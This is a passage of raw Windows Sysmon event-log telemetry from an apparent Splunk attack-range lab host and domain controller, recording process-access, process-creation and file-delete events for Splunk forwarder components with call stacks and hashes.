Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC03879C95523C19E6958BED681643AE,SHA256=FC52B3DDFEFAE0794C4B7D090694882B1E8F4D7D65C54FE0493088D883706973,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218014Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:44.880{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1364-6216-9104-000000003902}2936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218013Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:44.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218012Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:44.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218011Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:44.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218010Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:44.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218009Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:44.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218008Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:44.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218007Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:44.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218006Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:44.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218005Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:44.880{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218004Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:44.880{4F8D34B0-F11B-6215-0500-000000003902}412532C:\Windows\system32\csrss.exe{4F8D34B0-1364-6216-9104-000000003902}2936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218003Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:44.880{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1364-6216-9104-000000003902}2936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000218002Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:44.881{4F8D34B0-1364-6216-9104-000000003902}2936C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000218001Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:44.677{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7F718542A15407CE326FECB0EEC3EAE,SHA256=BF86966D08A04BDFD3D1AB71E8AA50C8E0250BECE0EDC1BAACEA2D7A484D5BCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293531Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:44.295{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE3E1BF5206890B073B0B1B18A5CD590,SHA256=FA369BAD1942F33EAC9161546CEB7B1BB04E9DAAAE3ABDE39DD226DEE7E510B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000293532Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 10:58:45.311{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=271F19DEE2CF95357C6EC6C1266313FE,SHA256=46AC7A641F4632F490BFC4B7486050249057AEEFEFAE4A54F6A059BC7DA17FC9,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000218028Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:45.380{4F8D34B0-F11E-6215-2B00-000000003902}27842804C:\Windows\system32\conhost.exe{4F8D34B0-1365-6216-9204-000000003902}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218027Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:45.380{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218026Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:45.380{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218025Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:45.380{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218024Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:45.380{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218023Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:45.380{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218022Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:45.380{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218021Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:45.380{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218020Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:45.380{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218019Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:45.380{4F8D34B0-F11C-6215-0C00-000000003902}7283600C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000218018Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:45.380{4F8D34B0-F11B-6215-0500-000000003902}4121208C:\Windows\system32\csrss.exe{4F8D34B0-1365-6216-9204-000000003902}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000218017Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 10:58:45.380{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-1365-6216-9204-000000003902}3168C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program 